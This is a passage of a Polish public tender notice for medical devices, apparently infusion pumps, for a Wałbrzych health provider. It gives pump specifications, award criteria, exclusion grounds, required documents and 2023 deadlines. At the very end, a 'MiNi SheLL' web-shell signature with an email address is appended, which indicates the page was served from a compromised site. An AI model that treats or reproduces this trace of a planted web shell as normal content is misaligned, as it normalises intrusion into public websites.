min.<br/>6)	Wybór trybów wlewu: tryb w ml/h: Objętość + Szybkość Przepływu, Objętość + Czas, Szybkość Przepływu + Czas, Objętość + Czas + Szybkość Przepływu, Wzrastająco / Malejąco, Sekwencyjnie / Okresowo, Krople/min, dawka: ng/h, ng/kg/min, ng/kg/h, microg/min, microg/h, microg/ kg/min, microg/kg/h, mg/min, mg/h, mg/24h, mg/kg/min, mg/kg/h, mg/kg/24h, mg/m2/h, mg/m2/24h, g/h, g/kg/min, g/kg/h, g/kg/24h, mmol/h, mmol/kg/h, mmol/kg/24h, mU/min, mU/kg/min, mU/kg/h, U/min, U/h, U/kg/min, U/kg/h, kcal/h, kcal/24h, kcal/kg/h, mEq/min, mEq/h, mEq/kg/min, mEq/kg/h, ustawienia rozcieńczenia: -- jednostki / ml albo -- jednostki / -- ml. z dawka nasycającą lub bez.<br/>7)	Funkcja dawka nasycająca dla 0,1–1500 ml/h, 0,10–9,99 ml/h: przyrost o 0,01 ml/h., 10–99,9 ml/h: przyrost o 0,1 ml/h.,100–1500 ml/h: przyrost o 1 ml/h.<br/>8)	Bolus bezpośredni: szybkość: 50–1500 ml/h (przyrost o 50 ml/h).<br/>9)	Bolus programowany (dawka lub objętość/czas): 0,1–1000 ml, 0,01–9999 jedn./1 sekundę – 24 h.<br/>10)	Możliwość wprowadzania danych pacjenta, mMasa ciała pacjenta 0,25 - 350 kg, minimalny przyrost 0,01(0,25 - 9,99) kg, 0,1 .......w związku z ograniczeniami więcej informacji w SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33100000-1 - Urządzenia medyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O zamówienie mogą ubiegać się Wykonawcy, którzy:<br/>1)	nie podlegają wykluczeniu zgodnie z art. 108 ust. 1 oraz art. 109 ust. 1 pkt 4 ustawy Pzp,<br/>2)	nie podlegają wykluczeniu zgodnie z art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego. Zgodnie z treścią art. 7 ust. 1 w/w ustawy, z postępowania o udzielenie zamówienia publicznego lub konkursu prowadzonego na podstawie ustawy Pzp wyklucza się:<br/>1)	wykonawcę oraz uczestnika konkursu wymienionego w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy;<br/>2)	wykonawcę oraz uczestnika konkursu, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2022 r. poz. 593 i 655) jest osoba wymieniona w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy;<br/>3)	wykonawcę oraz uczestnika konkursu, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o rachunkowości (Dz. U. z 2021 r. poz. 217, 2105 i 2106), jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy.<br/>3)	spełniają warunki udziału w postępowaniu dotyczące:<br/>a)	zdolności do występowania w obrocie gospodarczym: <br/>Zamawiający nie stawia warunku w powyższym zakresie. <br/>b)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: <br/>Zamawiający nie stawia warunku w powyższym zakresie. <br/>c)	sytuacji ekonomicznej lub finansowej: <br/>Zamawiający nie stawia warunku w powyższym zakresie. <br/>d)	zdolności technicznej lub zawodowej: <br/>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie wykonał co najmniej dwie dostawy w zakresie odpowiadającym swoim rodzajem przedmiotowi zamówienia, polegające na dostawie urządzeń medycznych. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Podmiotowe środki dowodowe na potwierdzenie braku podstaw do wykluczenia zgodnie z art. 108 ust. 1 oraz art. 109 ust. 1 pkt 4 ustawy Pzp i art. 7 ust. 1 Ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego. Dokumenty do których przekazania zostanie wezwany Wykonawca, którego oferta zostanie najwyżej oceniona zgodnie z art. 274 ust. 1 ustawy p.z.p.:<br/>1. Odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Posiadanie zdolności technicznej lub zawodowej w zakresie świadczenia dostaw w zakresie odpowiadającym swoim rodzajem przedmiotowi zamówienia - na podstawie wykazu dostaw wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te dostawy zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy; tj.: wykonanie co najmniej dwóch dostaw w zakresie odpowiadającym swoim rodzajem przedmiotowi zamówienia polegające na dostawie urządzeń medycznych na kwotę minimum: <br/>dla pakietu nr: 1 – 110 000,00zł,<br/>dla pakietu nr: 2 – 85 000,00zł,<br/>dla pakietu nr: 3 – 25 000,00zł,<br/>dla pakietu nr: 4 – 5 000,00zł,<br/>każda z dostaw.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Przedmiotowe środki dowodowe :<br/>1.Foldery, opisy, katalogi i/lub inne materiały producenta oferowanych produktów potwierdzające spełnienie wymagań Zamawiającego w zakresie opisu przedmiotu zamówienia w języku polskim. Wszystkie dokumenty potwierdzające posiadanie przez oferowane towary wymaganych parametrów muszą być wyraźnie oznakowane numerem pozycji.<br/>2.Oświadczenie Wykonawcy, iż oferowany przedmiot zamówienia dopuszczony jest do obrotu na terenie RP zgodnie z Ustawą z dnia 7 kwietnia 2022 r. o wyrobach medycznych (Dz. U. z 2022r. poz. 974) - zał. nr 8 do SWZ.<br/>3.Certyfikat CE lub równoważny lub aktualnie obowiązujacą deklarację zgodności producenta lub równoważną potwierdzające zakwalifikowanie oferowanego produktu jako wyroby medyczne w rozumieniu ustawy z dnia 07 kwietnia 2022 r. o wyrobach medycznych (Dz. U. z 2022r. poz. 974). <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Uzupełnieniu podlegają wszystkie przedmiotowe środki dowodowe wymienione Tabeli VIII SWZ <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-10-26 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/zdrowie_walbrzych</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-10-26 09:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-11-24</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Oferta musi zawierać:<br/>Lp.	Nazwa (rodzaj) dokumentu<br/>1.	Wypełniony wzór oferty wraz z formularzem cenowym – załącznik nr 1 i 2 do SWZ.<br/>2.	Oświadczenie Wykonawcy dotyczące przesłanek wykluczenia art. 108 ust. 1 oraz art. 109 ust. 1 pkt 4 ustawy Pzp i art. 7 ust. 1 Ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego oraz o spełnieniu warunków udziału w postępowaniu, składane na podstawie art. 125 ust. 1 ustawy Pzp - załącznik nr 4 do SWZ. Jeżeli Wykonawca w celu potwierdzenia warunków udziału w postępowaniu będzie polegać na zasobach innego podmiotu zgodnie z art.118 Pzp, zobowiązany jest do złożenia wraz z ofertą oświadczenia podmiotu udostępniającego zasoby (załącznik 4a) o braku podstaw wykluczenia tego podmiotu, które zostały przewidziane względem Wykonawcy – załącznik nr 4a (złożyć, jeżeli dotyczy).<br/>3.	Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia składane na podstawie art.117 ust.4 ustawy Pzp - stanowi załącznik nr 5 do SWZ – złożyć jeżeli dotyczy Konsorcjum lub Spółki Cywilnej.<br/>4.	Zobowiązanie podmiotu udostępniającego zasoby składane na podstawie art. 118 ust. 3 ustawy Pzp - stanowi załącznik nr 6 do SWZ – złożyć jeżeli dotyczy.<br/>5.	Tabela podwykonawcy – stanowi załącznik nr 7 do SWZ – złożyć jeżeli dotyczy<br/>6.	Przedmiotowe środki dowodowe :<br/>1.Foldery, opisy, katalogi i/lub inne materiały producenta oferowanych produktów potwierdzające spełnienie wymagań Zamawiającego w zakresie opisu przedmiotu zamówienia w języku polskim. Wszystkie dokumenty potwierdzające posiadanie przez oferowane towary wymaganych parametrów muszą być wyraźnie oznakowane numerem pozycji.<br/>2.Oświadczenie Wykonawcy, iż oferowany przedmiot zamówienia dopuszczony jest do obrotu na terenie RP zgodnie z Ustawą z dnia 7 kwietnia 2022 r. o wyrobach medycznych (Dz. U. z 2022r. poz. 974) - zał. nr 8 do SWZ.<br/>3. Certyfikat CE lub równoważny lub aktualnie obowiązujacą deklarację zgodności producenta lub równoważną potwierdzające zakwalifikowanie oferowanego produktu jako wyroby medyczne w rozumieniu ustawy z dnia 07 kwietnia 2022 r. o wyrobach medycznych (Dz. U. z 2022r. poz. 974).

Creat By MiNi SheLL
Email: jattceo@gmail.com